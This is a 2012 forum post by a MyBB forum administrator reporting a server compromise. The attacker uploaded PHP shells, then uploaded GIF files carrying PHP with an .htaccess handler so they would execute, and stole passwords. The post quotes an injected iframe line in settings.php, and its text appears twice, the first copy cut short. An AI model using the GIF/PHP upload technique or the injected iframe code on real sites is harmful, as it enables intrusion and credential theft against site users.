2012-01-30, 04:13 PM
Hey,
I can verify that MyBB 1.6.5 has been hacked.
I have a forum where the hacker could freely upload files into the /avatars/ directory. This person started uploading .php files that gave him access to all parts of the server. He can browse the whole server and edit files, and thus was able to edit settings.php where he can easily place
I started deleting those files and now recently he uploaded .gif files with php code in them + he added a .htaccess file where he tells the webserver that .gif files should be handled as php ....
The GIF/PHP file tried to steal passwords from logged in users.
As he is able to browse the server, he can obviously also see the SQL password and thus edit all sorts of stuff on the SQL server... like templates, users, etc..
No usergroup on the forum has the right to upload files to the server other than for the avatars. This hacker was able to upload files into /cache/, /uploads/, /uploads/avatars/ and /uploads/201201/ .
I don't use FBConnect btw. I have a few plugins though which are: Awaiting Activation Message (1.6), Akismet (1.2.1), Auto Media (1.1.9), Spider Bots (1.1), Forum Cleaner (2.5.1), Google Analytics (1.5), Gravatar (0.1), Image Resizer & Optimizer with GD (1.1.1), ProStats (1.8), Registration Security Question (1.2), and Thank You/Like System (1.3.1).
I also want to note that to solve the problem (as an emergency measure), I have CHMODDED all configuration back to 755. Even the cache and uploads directory are non-writeable right now. (Except for /uploads/avatars.)
I obviously also keep a close eye on that directory now....
I can verify that MyBB 1.6.5 has been hacked.
I have a forum where the hacker could freely upload files into the /avatars/ directory. This person started uploading .php files that gave him access to all parts of the server. He can browse the whole server and edit files, and thus was able to edit settings.php where he can easily place
echo "<iframe src=\"malwaresite\"></iframe>";
.I started deleting those files and now recently he uploaded .gif files with php code in them + he added a .htaccess file where he tells the webserver that .gif files should be handled as php ....
The GIF/PHP file tried to steal passwords from logged in users.
As he is able to browse the server, he can obviously also see the SQL password and thus edit all sorts of stuff on the SQL server... like templates, users, etc..
No usergroup on the forum has the right to upload files to the server other than for the avatars. This hacker was able to upload files into /cache/, /uploads/, /uploads/avatars/ and /uploads/201201/ .
I don't use FBConnect btw. I have a few plugins though which are: Awaiting Activation Message (1.6), Akismet (1.2.1), Auto Media (1.1.9), Spider Bots (1.1), Forum Cleaner (2.5.1), Google Analytics (1.5), Gravatar (0.1), Image Resizer & Optimizer with GD (1.1.1), ProStats (1.8), Registration Security Question (1.2), and Thank You/Like System (1.3.1).
I also want to note that to solve the problem (as an emergency measure), I have CHMODDED all configuration back to 755. Even the cache and uploads directory are non-writeable right now. (Except for /uploads/avatars.)
I obviously also keep a close eye on that directory now....